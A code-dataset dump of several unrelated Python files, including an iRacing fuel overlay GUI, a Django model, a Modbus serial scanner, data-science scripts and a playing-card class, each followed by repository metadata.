        self.fontsize_label = Label(self.fontsize_frame, text="Font size", font=self.parent_obj.font, bg=self.bg_color, fg=self.fg_color)
        self.fontsize_label.pack(fill='both')
        self.fontsize_slider = Scale(self.fontsize_frame, from_=7, to=30, orient='horizontal', command=self.set_font_size)
        self.fontsize_slider.set(self.parent_obj.fuel_app.font_size)
        self.fontsize_slider.pack()
        self.textpadding_label = Label(self.textpadding_frame, text="Text padding", font=self.parent_obj.font, bg=self.bg_color, fg=self.fg_color)
        self.textpadding_label.pack(fill='both')
        self.textpadding_slider = Scale(self.textpadding_frame, from_=0, to=50, orient='horizontal', command=self.set_text_padding)
        self.textpadding_slider.set(self.parent_obj.fuel_app.text_padding)
        self.textpadding_slider.pack()
        self.lockbutton = Button(self.lockbutton_frame, text='Toggle Fuel Lock', font=self.font, width=self.button_width, height=self.button_height, fg=self.fg_color, bg=self.button_color, command=self.toggle_fuel_lock)
        self.lockbutton.pack()
        # Add a hover info window to explain the button's functionality
        self.lockbutton_hover_info = HoverInfoWindow(master_widget=self.lockbutton, text="lock or unlock the fuel overlay to position it to your liking")

    def lock_fuel_lock(self):
        """Force the fuel overlay back into the locked (non-draggable) state."""
        if not self.parent_obj.fuel_app.locked:
            self.parent_obj.fuel_app.set_drag_bind(False)
            self.parent_obj.fuel_app.locked = True

    def toggle_fuel_lock(self):
        """Flip the fuel overlay between draggable and locked."""
        self.parent_obj.fuel_app.locked = not self.parent_obj.fuel_app.locked
        # Drag bindings are active exactly when the overlay is unlocked.
        self.parent_obj.fuel_app.set_drag_bind(not self.parent_obj.fuel_app.locked)

    def set_font_size(self, value):
        """Slider callback: apply a new font size to the fuel overlay."""
        self.parent_obj.fuel_app.resize_text(font_size=int(value))

    def set_text_padding(self, value):
        """Slider callback: apply new text padding to the fuel overlay."""
        self.parent_obj.fuel_app.resize_padding(text_padding=int(value))
class FuelScreen(ChildScreen):
    """Borderless always-on-top fuel overlay, refreshed by a daemon thread."""

    def __init__(self, parent_obj, width, height, telemetry, ir_conn, state):
        super().__init__(parent_obj, width, height)
        # Initialization. offset_right/offset_down come from load_config()
        # in ChildScreen.__init__ — presumably the saved window position.
        self.master.title("FuelScreen")
        self.master.geometry(f"+{self.offset_right}+{self.offset_down}")
        self.master.overrideredirect(True)
        self.master.lift()
        self.master.wm_attributes("-topmost", True)
        self.set_styling_vars()
        # Start locked: the overlay cannot be dragged until unlocked via settings.
        self.locked = True
        self.init_visuals()
        # Create a thread for updating the dashboard data
        thread = threading.Thread(target=self.update_dash, args=[telemetry, ir_conn, state])
        # Set this thread to be a daemon, this way the application will close when all non-daemon threads are closed
        # (the only non daemonic thread should be the main thread for this functionality)
        thread.daemon = True
        thread.start()

    def set_styling_vars(self):
        """
        sets the variables that are dependent on input (=settings) variables
        font, block width, block height, block sub height
        :return:
        """
        self.font = f'{self.font_style} {self.font_size} {self.font_extra}'
        # Automatically calculate the block dimensions with font size and text padding as customizable settings
        self.block_width, self.block_height = int(self.font_size * 4.5 + self.text_padding), int(self.font_size * 5 + self.text_padding)
        self.block_sub_height = int(self.block_height / 3)
        # Calculate the value of the lower sub block to prevent 1 pixel offset due to mod(block_height,3) NOT being a natural number (N)
        self.block_sub_height_last = self.block_height - 2*self.block_sub_height

    def update_dash(self, tm, ir_conn, state):
        """
        Loop that updates the frontend (dashboard) based on the data it gets from the backend (iRacing telemetry).
        Note that this function is supposed to be called in a different thread than the main
        :param tm: telemetry object; tm.step() refreshes its fuel fields
        :param ir_conn: iRacing connection handle passed through to tm.step()
        :param state: shared state object; state.ir_connected gates UI updates
        :return: never returns (infinite loop; thread is a daemon)
        """
        # NOTE(review): tkinter is not thread-safe; StringVar.set() is called
        # here from a worker thread. This commonly works on CPython but is
        # not guaranteed — confirm acceptable for this app.
        while True:
            # Update the telemetry data
            tm.step(state=state, ir_conn=ir_conn)
            # Update the frontend if still connected
            if state.ir_connected:
                self.fuelvar.set(f"{tm.fuel:.2f}")
                self.lastvar.set(f"{tm.cons:.2f}")
                self.avgvar.set(f"{tm.avg_cons:.2f}")
                self.targetcurrentvar.set(f"{tm.target_cons_current:.2f}")
                self.targetextravar.set(f"{tm.target_cons_extra:.2f}")
                self.lapsvar.set(f"{tm.laps_left_current}")
                self.lapsextravar.set(f"{tm.laps_left_extra}")
            # Go to sleep. Minimum step-time is (1/60) seconds (=approx 17ms) as iRacing telemetry is updated at 60 Hz.
            step_time = 1
            time.sleep(step_time)

    def respawn_visuals(self):
        """Recompute styling vars and rebuild all widget frames from scratch."""
        self.set_styling_vars()
        self.clear_frame(self.fuel_frame)
        self.clear_frame(self.last_frame)
        self.clear_frame(self.avg_frame)
        self.clear_frame(self.target_frame)
        self.clear_frame(self.laps_frame)
        self.init_visuals()

    def resize_text(self, font_size):
        # Applied immediately by rebuilding the widgets.
        self.font_size = font_size
        self.respawn_visuals()

    def resize_padding(self, text_padding):
        # Applied immediately by rebuilding the widgets.
        self.text_padding = text_padding
        self.respawn_visuals()

    def change_offset_right(self, offset_right):
        """Move the overlay horizontally to the given screen offset."""
        self.offset_right = offset_right
        self.master.geometry(f"+{self.offset_right}+{self.offset_down}")

    def change_offset_down(self, offset_down):
        """Move the overlay vertically to the given screen offset."""
        self.offset_down = offset_down
        self.master.geometry(f"+{self.offset_right}+{self.offset_down}")

    def clear_frame(self, frame):
        """Remove a frame from the grid and destroy all of its children."""
        frame.grid_forget()
        for widgets in frame.winfo_children():
            widgets.destroy()

    def init_visuals(self):
        """
        Adds the visual elements of the fuel overlay
        :return:
        """
        # ------------------------------------ FUEL ------------------------------------------------------------
        self.fuel_frame = Frame(self.master, bg=self.bg_color, width=self.block_width, height=self.block_height)
        self.fuel_frame.grid(row=0, column=0)
        self.fuel_frame.grid_propagate(False)
        # ------------------------------------ Header Labels -----------------------------------------------------------
        self.fuelheader = Label(self.fuel_frame, text="Fuel", font=self.font, fg=self.color_header, bg=self.bg_color)
        # Use .place() instead of grid or pack to set the position of the textlabels more precisely
        self.fuelheader.place(relx=0.5, rely=0.165, anchor='center')
        # ------------------------------------ Value Labels ------------------------------------------------------------
        self.fuelvar = StringVar(master=self.fuel_frame)
        self.fuelvar.set("000.00")
        self.fuellabel = Label(self.fuel_frame, textvariable=self.fuelvar, font=self.font, bg=self.bg_color, fg=self.color_values)
        self.fuellabel.place(relx=0.5, rely=0.66, anchor='center')
        # ------------------------------------ LAST ------------------------------------------------------------
        self.last_frame = Frame(self.master, bg=self.bg_color, width=self.block_width, height=self.block_height)
        self.last_frame.grid(row=0, column=1)
        self.last_frame.grid_propagate(False)
        self.lastheader = Label(self.last_frame, text="Last", font=self.font, fg=self.color_header, bg=self.bg_color)
        self.lastheader.place(relx=0.5, rely=0.165, anchor='center')
        self.lastvar = StringVar()
        self.lastvar.set("000.00")
        self.lastlabel = Label(self.last_frame, textvariable=self.lastvar, font=self.font, bg=self.bg_color, fg=self.color_values)
        self.lastlabel.place(relx=0.5, rely=0.66, anchor='center')
        # ------------------------------------ AVG ------------------------------------------------------------
        self.avg_frame = Frame(self.master, bg=self.bg_color, width=self.block_width, height=self.block_height)
        self.avg_frame.grid(row=0, column=2)
        self.avg_frame.grid_propagate(False)
        self.avgheader = Label(self.avg_frame, text="Avg", font=self.font, fg=self.color_header, bg=self.bg_color)
        self.avgheader.place(relx=0.5, rely=0.165, anchor='center')
        self.avgvar = StringVar()
        self.avgvar.set("000.00")
        self.avglabel = Label(self.avg_frame, textvariable=self.avgvar, font=self.font, bg=self.bg_color, fg=self.color_values)
        self.avglabel.place(relx=0.5, rely=0.66, anchor='center')
        # ------------------------------------ TARGET ------------------------------------------------------------
        self.target_frame = Frame(self.master, bg=self.bg_color, width=self.block_width, height=self.block_height)
        self.target_frame.grid(row=0, column=3)
        self.target_frame.grid_propagate(False)
        # Target frame is divided in 3 sub-frames (2 values + 1 header)
        self.target_header_frame = Frame(self.target_frame, bg=self.bg_color, width=self.block_width, height=self.block_sub_height)
        self.target_header_frame.grid(row=0, column=0)
        self.target_header_frame.grid_propagate(False)
        self.target_current_frame = Frame(self.target_frame, bg=self.bg_color, width=self.block_width, height=self.block_sub_height)
        self.target_current_frame.grid(row=1, column=0)
        self.target_current_frame.grid_propagate(False)
        self.target_extra_frame = Frame(self.target_frame, bg=self.bg_color_special, width=self.block_width, height=self.block_sub_height_last)
        self.target_extra_frame.grid(row=2, column=0)
        self.target_extra_frame.grid_propagate(False)
        self.targetheader = Label(self.target_frame, text="Target", font=self.font, fg=self.color_header, bg=self.bg_color)
        self.targetheader.place(relx=0.5, rely=0.165, anchor='center')
        self.targetcurrentvar = StringVar()
        self.targetcurrentvar.set("000.00")
        self.targetcurrentlabel = Label(self.target_current_frame, textvariable=self.targetcurrentvar, font=self.font, bg=self.bg_color, fg=self.color_values)
        self.targetcurrentlabel.place(relx=0.5, rely=0.5, anchor='center')
        self.targetextravar = StringVar()
        self.targetextravar.set("000.00")
        self.targetextralabel = Label(self.target_extra_frame, textvariable=self.targetextravar, font=self.font, bg=self.bg_color_special, fg=self.color_special)
        self.targetextralabel.place(relx=0.5, rely=0.5, anchor='center')
        # ------------------------------------ LAPS ------------------------------------------------------------
        self.laps_frame = Frame(self.master, bg=self.bg_color, width=self.block_width, height=self.block_height)
        self.laps_frame.grid(row=0, column=4)
        self.laps_frame.grid_propagate(False)
        # Laps frame is divided in 3 sub-frames (2 values + 1 header)
        self.laps_header_frame = Frame(self.laps_frame, bg=self.bg_color, width=self.block_width, height=self.block_sub_height)
        self.laps_header_frame.grid(row=0, column=0)
        self.laps_header_frame.grid_propagate(False)
        self.laps_current_frame = Frame(self.laps_frame, bg=self.bg_color, width=self.block_width, height=self.block_sub_height)
        self.laps_current_frame.grid(row=1, column=0)
        self.laps_current_frame.grid_propagate(False)
        self.laps_extra_frame = Frame(self.laps_frame, bg=self.bg_color_special, width=self.block_width, height=self.block_sub_height_last)
        self.laps_extra_frame.grid(row=2, column=0, sticky='SE', pady=0)
        self.laps_extra_frame.grid_propagate(False)
        self.lapsheader = Label(self.laps_frame, text="Laps", font=self.font, fg=self.color_header, bg=self.bg_color)
        self.lapsheader.place(relx=0.5, rely=0.165, anchor='center')
        self.lapsvar = StringVar()
        self.lapsvar.set("000.00")
        self.lapslabel = Label(self.laps_current_frame, textvariable=self.lapsvar, font=self.font, bg=self.bg_color, fg=self.color_values)
        self.lapslabel.place(relx=0.5, rely=0.5, anchor='center')
        self.lapsextravar = StringVar()
        self.lapsextravar.set("000.00")
        self.lapsextralabel = Label(self.laps_extra_frame, textvariable=self.lapsextravar, font=self.font, bg=self.bg_color_special, fg=self.color_special)
        self.lapsextralabel.place(relx=0.5, rely=0.5, anchor='center')
| RacingInsights/RacingInsights-V1 | previous_versions/very_old_code/dashboard.py | dashboard.py | py | 20,437 | python | en | code | 0 | github-code | 90 |
43486354133 | from django.db import models
from dataworkspace.apps.core.models import (
TimeStampedUserModel,
)
class UploadedTable(TimeStampedUserModel):
    """A user-uploaded database table, identified by schema and table name."""

    schema = models.TextField()
    table_name = models.TextField()
    data_flow_execution_date = models.DateTimeField()

    def display_name(self):
        """Return the fully qualified ``schema.table_name`` identifier."""
        return "{0}.{1}".format(self.schema, self.table_name)
| uktrade/data-workspace | dataworkspace/dataworkspace/apps/your_files/models.py | models.py | py | 349 | python | en | code | 42 | github-code | 90 |
297217928 | from pymodbus.client.sync import ModbusSerialClient, ConnectionException
import glob
import json
def modbus_rtu_device_scanner(serial_devices=None, baud_rates=None):
    """
    Scan list of serial devices on every possible configuration of speed (baud
    rate), parity and stop bits, looking for Modbus RTU devices by probing the
    full range of possible IDs 1..247.
    :param serial_devices: list of serial port names {ttyUSB0, ttyUSB1, ...};
                           defaults to ['/dev/ttyUSB0']
    :param baud_rates: list of available baud rates (port speed);
                       defaults to [9600, 19200]
    :return: JSON string mapping each port name to its serial configuration
             {method, port, baudrate, bytesize, parity, stopbit, timeout,
             modbus_ids[]} with the IDs of the Modbus devices found.
             NOTE: keyed by port name, so the last configuration that found
             devices on a port wins.
    """
    # Avoid mutable default arguments: resolve the defaults per call.
    if serial_devices is None:
        serial_devices = ['/dev/ttyUSB0']
    if baud_rates is None:
        baud_rates = [9600, 19200]
    serial_device_config_list = {}
    modbus_timeout = 1
    for serial_device in serial_devices:
        for baud_rate in baud_rates:
            for parity in ['N', 'E', 'O']:
                serial_device_config = {}
                data_bits = 8
                # Modbus RTU convention: 2 stop bits without parity, else 1.
                stop_bits = 2 if parity == 'N' else 1
                # Save current scanned serial port configuration.
                serial_device_config.update({
                    'method': 'rtu',
                    'port': str(serial_device),
                    'baudrate': baud_rate,
                    'parity': str(parity),
                    'bytesize': data_bits,
                    'stopbit': stop_bits,
                    'timeout': modbus_timeout
                })
                print ('Scan serial device: {}'.format(serial_device_config))
                client = ModbusSerialClient(method='rtu', port=str(serial_device), timeout=modbus_timeout, bytesize=data_bits,
                                            baudrate=baud_rate, stopbits=stop_bits, parity=str(parity))
                modbus_devices_id = []
                # Fix: 'connected' was unbound when connect() raised, which
                # made the 'if connected:' test below fail with NameError.
                connected = False
                try:
                    connected = client.connect()
                except ConnectionException as e:
                    print('   Error connection: {}'.format(e))
                if connected:
                    print ('SUCCESS connected to device: name {}'.format(serial_device))
                    for i in range(1, 248):
                        try:
                            bytes_buffer = client.read_holding_registers(address=0, count=1, unit=i)
                            # pymodbus signals errors with function codes >= 0x80;
                            # the assert routes those into the except branch.
                            assert (bytes_buffer.function_code < 0x80)
                            modbus_devices_id.append(i)
                            print ('    Found modbus device with ID: {}, read bytes: {}'.format(i, bytes_buffer))
                        except Exception as e:
                            print ('    Except id: {}, exception: {}'.format(i, e))
                    client.close()
                    if modbus_devices_id:
                        serial_device_config.update({'modbus_ids': modbus_devices_id})
                        serial_device_config_list.update({str(serial_device): serial_device_config})
                else:
                    print ('FAILED to connect device: name {}'.format(serial_device))
                    continue
    return json.dumps(serial_device_config_list)
if __name__ == '__main__':
    # Discover candidate USB serial ports on this machine.
    serial_devices = glob.glob('/dev/ttyUSB[0-9]*')
    print ('Device names : ' + str(serial_devices))
    # NOTE(review): the detected devices are printed but NOT passed to the
    # scanner below (the call using them is commented out), so only the
    # default '/dev/ttyUSB0' is actually scanned — confirm this is intended.
    # modbus_rtu_device_scanner(serial_devices=serial_devices)
    print('Result: ' + str(modbus_rtu_device_scanner()))
| indeema-bushko/python_examples | modbus_device_scanner/modbus_device_scanner.py | modbus_device_scanner.py | py | 3,408 | python | en | code | 0 | github-code | 90 |
72442516456 | # -*- coding: utf-8 -*-
from openerp.osv import orm, fields
import logging
from openerp import SUPERUSER_ID
from datetime import datetime as dt
_logger = logging.getLogger(__name__)
class nh_clinical_patient_pbp_monitoring(orm.Model):
_name = 'nh.clinical.patient.pbp_monitoring'
_inherit = ['nh.activity.data']
def _get_value(self, cr, uid, ids, fn, args, context=None):
result = dict.fromkeys(ids, False)
for r in self.read(cr, uid, ids, ['pbp_monitoring'], context=context):
result[r['id']] = 'On' if r['pbp_monitoring'] else 'Off'
return result
_columns = {
'pbp_monitoring': fields.boolean('Postural Blood Presssure Monitoring', required=True),
'value': fields.function(_get_value, type='char', size=3, string='String Value'),
'patient_id': fields.many2one('nh.clinical.patient', 'Patient', required=True),
}
def complete(self, cr, uid, activity_id, context=None):
activity_pool = self.pool['nh.activity']
activity = activity_pool.browse(cr, uid, activity_id, context=context)
api_pool = self.pool['nh.clinical.api']
pbp_pool = self.pool['nh.clinical.patient.observation.pbp']
if activity.data_ref.pbp_monitoring:
api_pool.cancel_open_activities(cr, uid, activity.parent_id.id, pbp_pool._name, context=context)
pbp_activity_id = pbp_pool.create_activity(cr, SUPERUSER_ID,
{'creator_id': activity_id, 'parent_id': activity.parent_id.id},
{'patient_id': activity.data_ref.patient_id.id})
date_schedule = dt.now().replace(minute=0, second=0, microsecond=0)
activity_pool.schedule(cr, SUPERUSER_ID, pbp_activity_id, date_schedule, context=context)
return super(nh_clinical_patient_pbp_monitoring, self).complete(cr, uid, activity_id, context=context) | LiberTang0/odoo-temp | nh_pbp/parameters.py | parameters.py | py | 1,904 | python | en | code | 0 | github-code | 90 |
5279081632 | import socket
import threading
# Simple single-client echo-style TCP server: accepts one connection,
# prints whatever the client sends and replies with a fixed greeting.
ip = '127.0.0.1'
port = 4321
s_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s_socket.bind((ip, port))
s_socket.listen()
c_socket, address = s_socket.accept()
print("Got connection from: {}, {}".format(c_socket, address))
m2 = "Hey there client!"
while True:
    msg = c_socket.recv(1024)
    # Fix: recv() returns b'' once the peer disconnects; the original loop
    # never exited, busy-looping on empty reads and eventually raising on
    # send(). Breaking here makes the close() calls below reachable.
    if not msg:
        break
    print(msg.decode())
    c_socket.send(m2.encode())
c_socket.close()
s_socket.close() | MONO-C1oud/Projects | learning_N_projects/pythonsockets/server.py | server.py | py | 417 | python | en | code | 0 | github-code | 90 |
8714564178 | '''
Created on May 13, 2011
@author: gaubert
'''
from netCDF4 import Dataset
import numpy
if __name__ == '__main__':
    # Round the lat/lon coordinate variables of a set of OSI-SAF/GHRSST
    # NetCDF files to 3 decimal places, rewriting the files in place
    # (opened in append mode 'a').
    # NOTE(review): 'dir' shadows the builtin of the same name.
    dir = '/homespace/gaubert/ifremer-data'
    input_files = [
                  # '20110502-EUR-L2P_GHRSST-SSTsubskin-AVHRR_METOP_A-eumetsat_sstmgr_metop02_20110502_220403-v01.7-fv01.0.nc',
                   '20110426-EUR-L2P_GHRSST-SSTsubskin-AVHRR_METOP_A-eumetsat_sstmgr_metop02_20110426_111003-v01.7-fv01.0.nc',
                   '20110420-EUR-L2P_GHRSST-SSTsubskin-AVHRR_METOP_A-eumetsat_sstmgr_metop02_20110420_064903-v01.7-fv01.0.nc',
                   '20110414-EUR-L2P_GHRSST-SSTsubskin-AVHRR_METOP_A-eumetsat_sstmgr_metop02_20110414_025203-v01.7-fv01.0.nc'
                   ]
    for input_file in input_files:
        dataset = Dataset('%s/%s' % (dir,input_file),'a')
        lat = dataset.variables['lat']
        lon = dataset.variables['lon']
        # Pull the full coordinate arrays into memory before rounding.
        lat_data = lat[:]
        lon_data = lon[:]
        lat_data = numpy.around(lat_data,3)
        lon_data = numpy.around(lon_data,3)
        # Write the rounded values back into the on-disk variables.
        dataset.variables['lat'][:] = lat_data
        dataset.variables['lon'][:] = lon_data
        dataset.sync()
dataset.close() | gaubert/viirs-data | src/eumetsat/round_osisaf_data.py | round_osisaf_data.py | py | 1,242 | python | en | code | 2 | github-code | 90 |
18558054279 | A, B = map(int, input().split())
count = 0
# A number is a palindrome iff its decimal string equals its reverse;
# this replaces the original per-digit int() comparison loop with the
# idiomatic slice check (identical results, simpler and faster).
for i in range(A, B + 1):
    s = str(i)
    if s == s[::-1]:
        count += 1
print("{}".format(count)) | Aasthaengg/IBMdataset | Python_codes/p03416/s909216871.py | s909216871.py | py | 277 | python | en | code | 0 | github-code | 90 |
13358720060 | import matplotlib.pyplot as plt
import pandas as pd
from sklearn.metrics import confusion_matrix, ConfusionMatrixDisplay, accuracy_score
from sklearn.svm import SVC
import streamlit as st
df = pd.read_csv("D:\Kathan\Au Assignment\TOD 310- Predicitive Analytics Business for Business\diabetes.csv")
# Visual Python: Data Analysis > Subset
feautres = df.loc[:, ['Pregnancies','Glucose','BloodPressure','SkinThickness','Insulin','BMI','DiabetesPedigreeFunction','Age']]
print(feautres)
# Visual Python: Data Analysis > Subset
target = df.loc[:, 'Outcome']
print(target)
# Visual Python: Machine Learning > Data Split
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(feautres, target, test_size=0.2, random_state=4)
# Visual Python: Machine Learning > Classifier
model = SVC(C=15,kernel="rbf",gamma="scale")
# Visual Python: Machine Learning > Fit/Predict
model.fit(X_train, y_train)
# Visual Python: Machine Learning > Fit/Predict
pred = model.predict(X_test)
print(pred)
# Confusion Matrix, Confusion Matrix Display and Accuracy Score
accs = accuracy_score(y_test,y_pred=pred)
print(accs)
cm = confusion_matrix(y_test,y_pred=pred)
print(cm)
disp = ConfusionMatrixDisplay(cm, display_labels=['1','0'])
disp.plot()
plt.show()
# For Converting this into Streamlit
st.write("Accuracy Score:", accs)
st.pyplot(disp.plot().figure_) | kathanraval/Predicitive-Analytics-For-Business | SVM.py | SVM.py | py | 1,433 | python | en | code | 0 | github-code | 90 |
18417676629 | import sys
sys.setrecursionlimit(10 ** 7)
f_inf = float('inf')
mod = 10 ** 9 + 7
def resolve():
    """Minimum repaints so no '#' appears left of any '.' split point.

    For every split index i (0..n) the cost is (number of '#' before i)
    + (number of '.' at or after i); the answer is the minimum cost.
    Single-pass equivalent of the original prefix/suffix count arrays.
    """
    n = int(input())
    s = input()
    black_so_far = 0
    white_remaining = s.count(".")
    best = f_inf
    for i in range(n + 1):
        best = min(best, black_so_far + white_remaining)
        if i < n:
            if s[i] == "#":
                black_so_far += 1
            else:
                white_remaining -= 1
    print(best)
if __name__ == '__main__':
resolve()
| Aasthaengg/IBMdataset | Python_codes/p03069/s948375960.py | s948375960.py | py | 621 | python | en | code | 0 | github-code | 90 |
70150875496 | import random
class Card():
    """Represents a single playing-card type.

    Attributes:
        value: Numeric game value of the card.
        name: Display name ("2".."10", "Jack", "Queen", "King", "Bishop",
            "Joker").
        suit: Suit name ("hearts", "spades", "clubs", "diamonds"; jokers
            use "red"/"black").
    """

    def __init__(self, value, name, suit):
        self.value = value
        self.name = name
        self.suit = suit

    def is_special(self):
        """
        Determine whether the card is one of the special cards (King,
        Bishop, Joker).
        """
        # Membership test replaces the original chained or-comparisons.
        return self.name.lower() in ("bishop", "king", "joker")

    def short_form(self):
        """
        The short form of a card is 2 characters describing it:
            2h = two of hearts
            kd = king of diamonds
            jr = red joker
        "10" is shortened to "t" so the form stays two characters.
        """
        if self.name == "10":
            return "t" + self.suit.lower()[0]
        return self.name.lower()[0] + self.suit.lower()[0]

    def __str__(self):
        if self.name.lower() == "joker":
            return self.name.lower()
        return self.name.lower() + " of " + self.suit.lower()

    def __repr__(self):
        # Debug-friendly representation (new; does not affect str()).
        return "Card(value=%r, name=%r, suit=%r)" % (self.value, self.name, self.suit)

    @staticmethod
    def _defined_cards():
        """All Card instances attached to the class as static attributes.

        Extracted helper: both lookup methods below previously duplicated
        this reflection expression.
        """
        return [card for card in vars(Card).values() if isinstance(card, Card)]

    @staticmethod
    def get_random_set_of_cards(number):
        """
        Get a random collection of the cards which were defined as static
        instances on the Card object.
        """
        return random.sample(Card._defined_cards(), number)

    @staticmethod
    def get_card_from_short_form(short_form):
        """
        Look up a statically defined card by its 2-character short form;
        returns None when no defined card matches.
        """
        for card in Card._defined_cards():
            if card.short_form() == short_form:
                return card
        return None
Card.two_hearts = Card(2, "2", "hearts")
Card.three_hearts = Card(3, "3", "hearts")
Card.four_hearts = Card(4, "4", "hearts")
Card.five_hearts = Card(5, "5", "hearts")
Card.six_hearts = Card(6, "6", "hearts")
Card.seven_hearts = Card(7, "7", "hearts")
Card.eight_hearts = Card(8, "8", "hearts")
Card.nine_hearts = Card(9, "9", "hearts")
Card.ten_hearts = Card(10, "10", "hearts")
Card.jack_hearts = Card(10, "Jack", "hearts")
Card.queen_hearts = Card(10, "Queen", "hearts")
Card.king_hearts = Card(11, "King", "hearts")
Card.bishop_hearts = Card(1, "Bishop", "hearts")
Card.two_spades = Card(2, "2", "spades")
Card.three_spades = Card(3, "3", "spades")
Card.four_spades = Card(4, "4", "spades")
Card.five_spades = Card(5, "5", "spades")
Card.six_spades = Card(6, "6", "spades")
Card.seven_spades = Card(7, "7", "spades")
Card.eight_spades = Card(8, "8", "spades")
Card.nine_spades = Card(9, "9", "spades")
Card.ten_spades = Card(10, "10", "spades")
Card.jack_spades = Card(10, "Jack", "spades")
Card.queen_spades = Card(10, "Queen", "spades")
Card.king_spades = Card(11, "King", "spades")
Card.bishop_spades = Card(1, "Bishop", "spades")
Card.two_clubs = Card(2, "2", "clubs")
Card.three_clubs = Card(3, "3", "clubs")
Card.four_clubs = Card(4, "4", "clubs")
Card.five_clubs = Card(5, "5", "clubs")
Card.six_clubs = Card(6, "6", "clubs")
Card.seven_clubs = Card(7, "7", "clubs")
Card.eight_clubs = Card(8, "8", "clubs")
Card.nine_clubs = Card(9, "9", "clubs")
Card.ten_clubs = Card(10, "10", "clubs")
Card.jack_clubs = Card(10, "Jack", "clubs")
Card.queen_clubs = Card(10, "Queen", "clubs")
Card.king_clubs = Card(11, "King", "clubs")
Card.bishop_clubs = Card(1, "Bishop", "clubs")
Card.two_diamonds = Card(2, "2", "diamonds")
Card.three_diamonds = Card(3, "3", "diamonds")
Card.four_diamonds = Card(4, "4", "diamonds")
Card.five_diamonds = Card(5, "5", "diamonds")
Card.six_diamonds = Card(6, "6", "diamonds")
Card.seven_diamonds = Card(7, "7", "diamonds")
Card.eight_diamonds = Card(8, "8", "diamonds")
Card.nine_diamonds = Card(9, "9", "diamonds")
Card.ten_diamonds = Card(10, "10", "diamonds")
Card.jack_diamonds = Card(10, "Jack", "diamonds")
Card.queen_diamonds = Card(10, "Queen", "diamonds")
Card.king_diamonds = Card(12, "King", "diamonds")
Card.bishop_diamonds = Card(1, "Bishop", "diamonds")
Card.joker_red = Card(0, "Joker", "red")
Card.joker_black = Card(0, "Joker", "black") | DaveTCode/PlatoonNiNoKuni | card.py | card.py | py | 4,138 | python | en | code | 0 | github-code | 90 |
18539194689 | h, w = (int(x) for x in input().split())
# Read the h x w grid; each '#' cell must have at least one orthogonally
# adjacent '#' neighbour, otherwise the answer is "No".
S = [list(input()) for _ in range(h)]
# Right, down, left, up offsets for the four orthogonal neighbours.
next_x = [1, 0, -1, 0]
next_y = [0, 1, 0, -1]
for y in range(h):
    for x in range(w):
        if S[y][x] == "#":
            for i in range(4):
                nx = x + next_x[i]
                ny = y + next_y[i]
                if 0 <= nx < w and 0 <= ny < h and S[ny][nx] == "#":
                    break
            else:
                # for-else: no neighbouring '#' was found for this cell,
                # so the configuration is impossible.
                print("No")
                exit()
print("Yes")
| Aasthaengg/IBMdataset | Python_codes/p03361/s604090831.py | s604090831.py | py | 475 | python | en | code | 0 | github-code | 90 |
44677421654 | from ast import increment_lineno
import csv
import matplotlib.pyplot as plt
plt.style.use('ggplot')
# Read and echo the raw CSV (the parsed rows are kept but the chart below
# uses hard-coded values).
file = open("english premier league data.csv")
csvreader = csv.reader(file)
header = next(csvreader)
print(header)
rows = []
for row in csvreader:
    rows.append(row)
#print(rows)
file.close()
# Top-six teams and their 2018-19 points totals, in matching order.
x = ['Man City', 'Liverpool', 'Chelsea', 'Tottenham', 'Arsenal', 'Man Utd',]
energy = [98,97,72,71,70,66]
x_pos = [i for i, _ in enumerate(x)]
plt.bar(x_pos,energy,color = 'green')
# Fix: the axis labels were swapped — xticks() puts the team names on the
# x-axis and the bar heights (points) on the y-axis.
plt.xlabel("Teams")
plt.ylabel("Points Earned")
plt.title("Points earned by EPL teams (2018-19)")
plt.xticks(x_pos,x)
#plt.show()
| braddyer01/csws-group30-CW | epldata.py | epldata.py | py | 613 | python | en | code | 2 | github-code | 90 |
41616327934 | from mlxtend.preprocessing import TransactionEncoder
# Fix: the mlxtend module is spelled "frequent_patterns"; the original
# "frequent_patters" raised ModuleNotFoundError on import.
from mlxtend.frequent_patterns import apriori, association_rules
# Fix: pandas is used below (pd.DataFrame) but was never imported.
import pandas as pd

# Market-basket transactions to mine for frequent itemsets and rules.
transactions=[
    ['bread','jam','butter'],
    ['bread','milk','eggs'],
    ['bread','milk','butter','jam'],
    ['milk','butter','eggs'],
    ['bread','milk','eggs']
]

te = TransactionEncoder()
# Fix: fit() returns the encoder itself, not the one-hot array; the array
# comes from transform() (per the mlxtend TransactionEncoder API).
te_ary = te.fit(transactions).transform(transactions)
df = pd.DataFrame(te_ary, columns=te.columns_)

# Frequent itemsets appearing in at least 40% of transactions.
fi = apriori(df, min_support=0.4, use_colnames= True)
# Association rules from those itemsets with confidence >= 0.7.
rules = association_rules(fi, metric = 'confidence', min_threshold=0.7)
print(fi)
print(rules)
| Vedhanth123/5th-Sem-OU | AIDM/association_rules.py | association_rules.py | py | 524 | python | en | code | 0 | github-code | 90 |
5417043662 | import numpy as np
from scipy.integrate import odeint
import matplotlib.pyplot as plt
import pylab as plot
from decimal import Decimal
#Initialize some constants
# Rate/Michaelis-Menten constants for the lead-biosensor gene circuit.
# Units are not stated in SOURCE -- presumably nM and minutes; TODO confirm.
vTX1 = 18.2 #reporter transcription rate constant
vTX2 = 18.2 #repressor transcription rate constant
KTX1 = 8.5 #Michaelis-Menten constant for reporter transcription
KTX2 = 8.5 #Michaelis-Menten constant for repressor transcription
lam_m1 = 0.08 #reporter mRNA degradation rate constant
lam_m2 = 0.08 #repressor mRNA degradation rate constant
kTL1 = 0.0076 #Reporter translation rate constant, 0.0076
kTL2 = 0.0076 #Repressor translation rate constant, 0.0076
KTL1 = 29.9 #Michaelis-Menten constant for translation of reporter
KTL2 = 29.9 #Michaelis-Menten constant for translation of repressor
vlamTLR = 13.5 #Translation resources degradation rate constant
KlamTLR = 53.2 #Michaelis-Menten constant for degradation of TL resources
kmat = 0.244 #reporter maturation rate constant
k2R = 50 #repressor dimerization rate constant
k_2R = 0.001 #repressor dimer dissociation rate constant
kr = 960 #association rate constant for repression
k_r = 2.4 #dissociation rate constant for repression
kdr1 = 3.0e7 #association rate constant for first derepression mechanism
k_dr1 = 12 #dissociation rate constant for first derepression mechanism
kdr2 = 3.0e7 #association rate constant for second derepression mechanism
k_dr2 = 4800 #dissociation rate constant for second derepression mechanism
kleak = 0.0033 #leak reporter transcription rate constant
def model(z,t,GR,TO,TA):
    """ODE right-hand side for the biosensor circuit, in odeint's (z, t, *args) form.

    z  -- state vector (9 species, see the unpacking below)
